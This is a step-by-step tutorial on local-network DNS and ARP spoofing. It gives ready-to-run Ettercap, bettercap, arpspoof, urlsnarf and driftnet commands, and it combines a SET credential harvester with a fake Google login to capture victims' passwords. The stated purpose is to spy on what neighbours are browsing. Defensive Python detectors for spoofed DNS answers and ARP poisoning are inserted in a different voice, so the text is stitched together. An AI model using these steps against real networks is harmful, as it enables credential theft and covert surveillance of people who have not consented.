
Intranet - Detailed Explanation of DNS Spoofing and ARP Spoofing

Table of Contents:

  • Cause of the Incident
  • DNS Spoofing
    • Principle
    • Practical Application
      • Using Ettercap for Pranks
      • Using SET + Ettercap for Phishing
      • Bettercap
      • Cain & Abel
  • ARP Spoofing
    • Principle
    • Practical Application
      • arpspoof
      • ettercap
      • bettercap
      • Cain & Abel

Cause of the Incident#

To see what the neighbor girl or brother is watching, or to remind the neighbor to be a bit quieter.

Reference Articles:


  • Kali: 192.168.1.107, used for attacking
  • Win7: 192.168.1.106, used for being attacked

Both machines are connected to the internet via a bridged network card.

Tools Used:

  • Ettercap
  • Bettercap
  • arpspoof and driftnet from the Dsniff tool suite

DNS Spoofing#

Principle#

  • What is DNS (Domain Name System)?

The Domain Name System (DNS) is a service on the internet. It acts as a distributed database that maps domain names to IP addresses, so that people can reach hosts by name instead of by number.

When we visit a domain such as soapffz.com, the browser asks the DNS server for the corresponding IP address and gets back 140.143.2.176 (my server has ping disabled).

  • What is DNS Spoofing?

DNS Spoofing is a deception in which an attacker impersonates the domain name server. The principle: if the attacker can pose as the name server and answer queries with their own IP address, the user ends up on the attacker's page instead of the homepage of the site they wanted. That is the whole basis of DNS Spoofing. It does not "hack" the target website in any way; it is purely impersonation and deception.

  • Therefore, the DNS hijacking often heard about from ISPs is when the ISP modifies the IP addresses corresponding to URLs in your network's default DNS server, leading to pop-up ads and other phenomena. An effective way to prevent ISP DNS hijacking is to change your DNS server to a public DNS address, such as 114.114.114.114.

For more detailed content on DNS resolution, refer to: Understanding DNS Records and Their Simple Applications in Penetration Testing

So what can we achieve with DNS Spoofing: Pranks or Phishing

Practical Application#

DNS Spoofing can be implemented on Linux using Ettercap (which also involves some ARP Spoofing) and can be combined with SET for phishing, or bettercap can be used.

On Windows, Cain & Abel can be used.

Using Ettercap for Pranks#

First, we use the powerful man-in-the-middle attack tool: Ettercap.

  1. Edit the Ettercap DNS file:

vim /etc/ettercap/etter.dns

For a prank, where you do not want the other party to reach any site at all, you can point every domain to a single IP. Here, to serve as a friendly reminder, we point everything to my own machine:

image

  2. Start an apache2 service.

Back up the default page /var/www/html/index.html, then replace its content with your own (the original page's markup nested the body inside the head and used the non-existent MIME type txt/html; both are corrected here):

<HTML>
<HEAD>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <TITLE>Hello, Big Brother</TITLE>
</HEAD>
<BODY>
    <p>Surprised, right?</p>
    <p>I'm just here to say hello</p>
    <p>No malice</p>
    <p>Let's play together sometime</p>
    <p>My website: https://soapffz.com/</p>
</BODY>
</HTML>

image

Then restart the apache2 service and check if it displays our page:

image

OK, no issues.

  3. Start the spoofing.

We first use the graphical interface (ettercap -G) and select Unified sniffing to sniff in man-in-the-middle mode:

image

Select the corresponding network card, then scan the local area network and open the host list through Host list:

image

Add the gateway to Target 1 and the attack target to Target 2:

image

Next, in Mitm (man-in-the-middle attack), select ARP poisoning:

image

Check remote sniffing link, confirm:

image

In the plugins, select dns_spoof:

image

Double-click, and a * will appear in front, then click Start sniffing to begin our DNS spoofing attack:

image

This way, our attack target will see our custom page whenever they open any webpage:

image

However, this kind of attack has drawbacks: HTTPS URLs cannot be spoofed this way (the certificate will not match), and the browser's address bar plainly exposes our IP:

image
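The two drawbacks above are exactly what a defender can look for. The following added example (my own code, not from the original post) takes constructed resolver answers from a victim host and flags the two signatures of a catch-all etter.dns: public names answered with a private address, and many names collapsing onto one address; it also cross-checks against answers from a trusted resolver such as the 114.114.114.114 mentioned earlier. All names, addresses and the reference table are constructed placeholders.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: (queried name, answer IP) pairs as a defender might
# export from a victim's resolver log or a DNS capture. 192.168.1.107 plays
# the role of the spoofing host's address from the write-up.
SAMPLE_ANSWERS = [
    ("www.google.com", "192.168.1.107"),
    ("mail.google.com", "192.168.1.107"),
    ("www.baidu.com", "192.168.1.107"),
    ("soapffz.com", "140.143.2.176"),
    ("printer.local", "192.168.1.20"),
]

# Constructed reference answers, e.g. what a trusted public resolver returned
# for the same names (203.0.113.10 is a documentation-range placeholder).
REFERENCE = {
    "www.google.com": {"203.0.113.10"},
    "soapffz.com": {"140.143.2.176"},
}

def is_private(ip):
    return ipaddress.ip_address(ip).is_private

def find_suspicious(answers, min_shared=3):
    """Flag two patterns typical of dns_spoof with a catch-all etter.dns:
    public names answered with a private address, and many distinct names
    collapsing onto one answer address (a sinkhole for the prank page)."""
    private_hits = []
    by_ip = defaultdict(set)
    for name, ip in answers:
        by_ip[ip].add(name)
        # .local names are expected to live in private space; others are not.
        if is_private(ip) and not name.endswith(".local"):
            private_hits.append((name, ip))
    sinks = {ip: sorted(n) for ip, n in by_ip.items() if len(n) >= min_shared}
    return {"private_answer": private_hits, "shared_sink": sinks}

def compare_with_reference(answers, reference):
    """Return (name, observed_ip, expected_ips) for names whose observed
    answer is not in the reference set. Names absent from the reference
    are skipped rather than reported."""
    mismatches = []
    for name, ip in answers:
        if name in reference and ip not in reference[name]:
            mismatches.append((name, ip, sorted(reference[name])))
    return mismatches

if __name__ == "__main__":
    print(find_suspicious(SAMPLE_ANSWERS))
    print(compare_with_reference(SAMPLE_ANSWERS, REFERENCE))
```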

Ettercap can also be driven from the command line. Enabling IP forwarding and preparing the spoofed page are the same as with the graphical interface, but the whole sequence of clicks above collapses into a single command:

ettercap -TqM ARP:remote -P dns_spoof /192.168.1.1// /192.168.1.107//

Parameter explanation:

  • -i: Specify the network interface; defaults to eth0 if omitted
  • -T: Use the text-only interface
  • -q: Quiet mode (do not print captured packets)
  • -M: Perform a man-in-the-middle attack
  • ARP:remote: ARP poisoning with remote sniffing (needed when one target is the gateway)
  • -P: Load the named plugin
  • The two positional arguments that follow are Target 1 and Target 2, each written as /IP// (the MAC and port fields left empty)

image

That covers the prank. How do we turn it into phishing? We only need to set, in /etc/ettercap/etter.dns, the IP addresses of the websites the victim is likely to visit to our own.

We would then also have to write a fake Google or Baidu page, which sounds like a lot of trouble.

Using SET + Ettercap for Phishing#

Of course, Ettercap is only used here as an example; there are other capable phishing tools, such as BlackEye.

Here we introduce the Social-Engineer Toolkit, abbreviated SET.

It is not the same thing as the Social Engineering Tools category in Kali's application menu:

image

As the name suggests, SET is mainly used for social engineering attacks, including phishing websites, wireless AP attacks, QRCode attacks, etc.

In this experiment, SET is mainly used to set up phishing websites and listen for account passwords sent in HTTP requests.

For other usage methods, refer to the article: Basic Usage Tutorial for Social Engineering Toolkit.

Use the setoolkit command to enter, and from here on, I will be lazy and copy from this article.

 Select from the menu:
   1) Social-Engineering Attacks  // Select 1, Social Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
   ......
   99) Exit the Social-Engineer Toolkit

First, select the first option in the menu, Social Engineering Attacks.

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors  // Select 2, Website Attacks
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules

Then, select the second option in the menu, Website Attacks.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method  // Select 3, Credential Harvesting
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

Select the third option, Credential Harvesting.

1) Web Templates  // Use predefined website templates
2) Site Cloner    // Clone a webpage
3) Custom Import  // Import a website from a specified directory

Here, for convenience, we directly select 1, using the built-in website templates in SET for the experiment.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.107]:

Note that it will use your default IP, which is your first IP:

image

If you are using dual network cards and want to penetrate hosts in other internal network segments, you can press Enter, and after pressing Enter, you will see the prompt:

image

Open a new terminal, edit the /etc/setoolkit/set.config file, and change the network card, and it will be OK:

image

Select 2, using the Google login page as the phishing website:

image

When you see

[*] Harvester is ready, have victim browse to your site.

this line means the harvester is ready. Opening our attack machine's IP on the victim's computer now shows our fake Google page:

image

At the same time, the SET console prints out a request record:

image

However, this is far too obvious; who doesn't know that 192.168.* is an internal IP? So we combine it with Ettercap:

Add the following content to /etc/ettercap/etter.dns:

google.com       A      192.168.1.107
*.google.com     A      192.168.1.107
www.google.com   PTR    192.168.1.107

image

Then execute Ettercap:

ettercap -TqM ARP -P dns_spoof /192.168.1.106///

The specific parameters have been explained earlier, then have the victim machine access google.com:

image

You can see that it opens our phishing interface, and then we log in:

image

We can see that both our Ettercap and SET have obtained the username and password! Phishing successful.

However, there are the following shortcomings:

  1. HTTPS is not handled: HTTPS requests are not forwarded to the target IP.

  2. After clicking Login on the phishing page, the victim should be redirected to the real site's homepage instead of staying on the login page.

BetterCap#

The best-known man-in-the-middle tool is Ettercap, but Bettercap was developed not to catch up with it but to replace it, for the following reasons:

  • Ettercap was very successful, but it has become outdated.
  • Ettercap's filters are complex and hard to learn.
  • Its host discovery does not work well in large networks.
  • It is poorly optimized and carries many features that researchers never use.
  • It is hard to extend; development requires C/C++.

Bettercap is updated fairly frequently, and the new version adopts an msf-style embedded terminal interface, which is immersive but also has some issues, such as input and output getting mixed together and line-refresh glitches.

This version of Bettercap has grown considerably in functionality, moving from a simple network analyzer to an all-round "cap" tool: it supports the familiar intranet ARP and DNS spoofing, plus Bluetooth Low Energy (BLE) recon, GPS sniffing, and sending Wake-On-LAN packets to devices with a given MAC address on the network. It is very powerful.

Download link (with Windows version): https://github.com/bettercap/bettercap/releases/latest

Kali does not ship it by default; install it with: apt-get install bettercap -y

First, let's look at some basic parameters: bettercap -h

image

Parameter explanation:

|Parameter|Meaning|
|:-----:|:-----:|
|-autostart string|Automatically start the listed modules (comma separated)|
|-caplet string|Read commands from a file and execute them in the interactive session|
|-cpu-profile file|Write a CPU profile to the given file|
|-debug|Print debug messages|
|-env-file string|Load an environment-variable file|
|-eval string|Run one or more commands separated by ; in the interactive session, e.g. to set variables from the command line|
|-gateway-override string|Use the given IP address instead of the default gateway; if not specified or invalid, the default gateway is used|
|-iface string|Network interface to bind to; if empty, the default interface is selected automatically|
|-mem-profile file|Write a memory profile to the given file|
|-no-colors|Disable colored output|
|-no-history|Disable the interactive session history file|
|-silent|Suppress all non-error logs|

Now let's open bettercap and take a look:

image

After opening, it will automatically start detecting hosts in the current subnet. Enter help to see many setting options:

image

The built-in commands are explained below:

|Command|Description|
|:-----:|:-----:|
|help MODULE|If no module name is provided, list available commands or show module-specific help.|
|active|Display information about active modules.|
|quit|Close the session and exit.|
|sleep SECONDS|Sleep for the given number of seconds.|
|get NAME|Get the value of variable NAME, use * alone, or use NAME * as a wildcard.|
|set NAME VALUE|Set variable NAME to VALUE.|
|read VARIABLE PROMPT|Display PROMPT to ask for user input that will be stored in VARIABLE.|
|clear|Clear the screen.|
|include CAPLET|Load and run this caplet in the current session.|
|! COMMAND|Execute a shell command and print its output.|
|alias MAC NAME|Assign an alias to a given endpoint with its MAC address.|

Module Description:

|Module|Description|
|:-----:|:-----:|
|any.proxy|Redirect traffic via the firewall to any specified proxy|
|api.rest|RESTful API module|
|arp.spoof|ARP spoofing module|
|ble.recon|Bluetooth Low Energy device discovery module|
|caplets|Lists and updates caplets|
|dhcp6.spoof|DHCPv6 spoofing module (changes the client's DNS server with forged DHCP packets, so it must be enabled together with dns.spoof)|
|dns.spoof|Answers DNS queries with spoofed responses|
|events.stream|Enabled by default; responsible for displaying the event stream during interactive sessions|
|gps||
|http.proxy|HTTP transparent proxy, can use Javascript module|
|http.server|HTTP server|
|https.proxy|HTTPS transparent proxy|
|https.server|HTTPS server|
|mac.changer|Change the MAC address of the active interface|
|mysql.server||
|net.probe|Probe the network by sending UDP data to every possible IP in the subnet|
|net.recon||
|net.sniff|Network sniffing module|
|packet.proxy||
|syn.scan|Perform SYN port scanning |
|tcp.proxy||
|ticker||
|update||
|wifi|WiFi module, with deauth attack (WiFi killer) and the ability to create soft APs|
|wol||

For detailed usage of each module, refer to this article: https://blog.csdn.net/u012570105/article/details/80561778

Bettercap Practical Application#

In Bettercap, set the domains to be spoofed and the address of your own server:

set dns.spoof.domains *.baidu.com
set dns.spoof.address 1.1.1.1
dns.spoof on

image

Set the DNS server address in Windows 7 to your own IP address:

image

After flushing the DNS cache, use the ping command (ping is not working here, which puzzles me; IPv4 forwarding is enabled):

image

We can see the DNS request information on our Kali side:

image

Cain & Abel#

Cain & Abel is a free password recovery tool for Microsoft operating systems, developed by Oxid.it, and is known as the poor man's L0phtcrack. It is very capable: network sniffing, network spoofing, cracking encrypted passwords, decoding scrambled passwords, revealing password boxes, showing cached passwords, analyzing routing protocols, and even listening in on VoIP calls made by others on the intranet.

Download link: http://www.oxid.it/cain.html. It requires WinPcap, but the WinPcap download page states: The WinPcap project has ceased development and WinPcap and WinDump are no longer maintained. We recommend using Npcap instead.

So we download Npcap directly from https://nmap.org/npcap/; the latest version is 0.99-r9, click to download.

When installing, in addition to the default options, check the last option, Install Npcap in WinPcap API-compatible Mode, so that Cain & Abel's WinPcap dependency is satisfied.

The main interface of Cain & Abel looks like this:

image

Let's take a look at the Tool interface, where the main functionality is still password cracking:

image

ARP Spoofing#

Principle#

ARP

The Address Resolution Protocol (ARP) is the TCP/IP protocol that resolves an IP address to a physical (MAC) address. When a host needs to send a frame, it broadcasts an ARP request carrying the target IP address to every host on the segment and learns the target's physical address from the reply. It then stores the IP-to-MAC pair in its ARP cache for a while, and subsequent lookups are answered from the cache to save resources.

ARP Spoofing

ARP Spoofing, also known as ARP poisoning (often mistranslated online as "ARP virus"), is an attack against the Ethernet Address Resolution Protocol. By planting a forged gateway entry in the ARP cache of a PC on the network, the attacker makes that PC treat the attacker's MAC address as the gateway's, which can cut off its connectivity. The attacker can thereby capture, and even modify, packets on the local area network, and can prevent specific computers or every computer on the network from connecting normally.

Implementation#

The most classic tool for implementing ARP spoofing on Linux is arpspoof (which is relatively stable), and ettercap and bettercap can also be used.

On Windows, you can use:

View the local ARP cache table:

  • (Common) arp -a: works everywhere, but executes slowly on Linux.
  • (Linux) ip neigh show: implemented through a different system call, netlink.

If ARP spoofing keeps failing, you can use arp -d to clear the ARP cache (requires administrator privileges).

arpspoof#

arpspoof can perform one-way or two-way spoofing (the latter by opening two terminals). The general syntax is:

arpspoof -i [interface] -t [target host] [host you want to impersonate]

-i selects the network interface and -t the target; if -t is omitted, the whole subnet is ARP-poisoned.

So to make Win7 (192.168.1.106) believe we are the gateway (192.168.1.1), and make the gateway believe we are Win7, we use the following two commands:

arpspoof -i eth0 -t 192.168.1.106 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.106

First, let's look at Win7's ARP cache table before performing ARP spoofing:

image

Then start the spoofing:

image

Check the ARP cache table again:

image

We find that the gateway's MAC address has become identical to Kali's. All traffic sent to the gateway therefore passes through Kali, and because Kali is at the same time telling the gateway that it is Win7, Win7 still surfs the internet normally without knowing that all of its traffic is being observed.

Remember to enable the Linux kernel's IP forwarding; otherwise the victim loses internet access, which raises suspicion:

sysctl net.ipv4.ip_forward
sysctl -w net.ipv4.ip_forward=1

image
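The symptom described in the ARP Spoofing principle and confirmed in the screenshots above (the gateway's MAC suddenly equal to another host's) is what a host-side check should watch for. The following added example (my own code, not from the original post) parses both `ip neigh show` and Windows `arp -a` output, compares two snapshots, and reports a changed gateway MAC and any unicast MAC that now answers for more than one IP; the snapshots and MAC addresses are constructed.

```python
import re
from collections import defaultdict

# Matches Linux 'ip neigh show' lines ("IP dev IF lladdr MAC STATE") and
# Windows 'arp -a' lines ("IP   MAC   dynamic"); MACs may use ':' or '-'.
_ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(?:dev\s+\S+\s+lladdr\s+)?"
    r"([0-9a-fA-F]{2}(?:[:-][0-9a-fA-F]{2}){5})\b"
)

def parse_neighbors(text):
    """Return {ip: mac} with MACs normalised to lower-case colon form.
    Lines without a hardware address (FAILED entries, headers) are skipped."""
    table = {}
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table

def is_unicast(mac):
    # Broadcast/multicast MACs have the group bit set in the first octet.
    return int(mac[:2], 16) & 1 == 0

def detect_poisoning(before, after, gateway_ip):
    """Compare two snapshots. Report a gateway MAC change and any unicast MAC
    that now maps to more than one IP (the gateway plus the spoofing host)."""
    findings = []
    old_gw, new_gw = before.get(gateway_ip), after.get(gateway_ip)
    if old_gw and new_gw and old_gw != new_gw:
        findings.append(("gateway_mac_changed", gateway_ip, old_gw, new_gw))
    by_mac = defaultdict(list)
    for ip, mac in after.items():
        if is_unicast(mac):
            by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate_mac", mac, sorted(ips)))
    return findings

# Constructed snapshots mirroring the write-up: before, the gateway has its
# own MAC; after, it carries the same MAC as the Kali host 192.168.1.107.
BEFORE = """192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.107 dev eth0 lladdr aa:bb:cc:dd:ee:ff STALE
192.168.1.50 dev eth0  FAILED
"""
AFTER = """Interface: 192.168.1.106 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.107         aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

if __name__ == "__main__":
    for f in detect_poisoning(parse_neighbors(BEFORE), parse_neighbors(AFTER), "192.168.1.1"):
        print(f)
```

Run periodically (or on a cron schedule) against a saved baseline, this turns the screenshot comparison in the post into an automated alert.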

ettercap#

Detailed usage was covered earlier; here is the command directly:

ettercap -i eth0 -TqM ARP /192.168.1.106// ///

image

This achieves the same effect as above.

bettercap#

Similarly, we start bettercap and run the following commands:

net.sniff on
set arp.spoof.targets 192.168.1.106
arp.spoof on

(arp.spoof.targets selects one or more targets; if it is not set, the whole subnet is spoofed.)

At this point ARP spoofing is running. If we capture with a tool like Wireshark, we find that only TCP packets are visible and no HTTP/HTTPS traffic is decoded; the HTTP/HTTPS proxies can be enabled with http.proxy on or https.proxy on.

To watch HTTP browsing in a separate window, use urlsnarf -i eth0 (run urlsnarf only after ARP spoofing is in place):

image

driftnet filters images out of the sniffed traffic and displays the pictures the victim is browsing: driftnet -i eth0:

image

Both driftnet and arpspoof belong to the Dsniff tool suite.
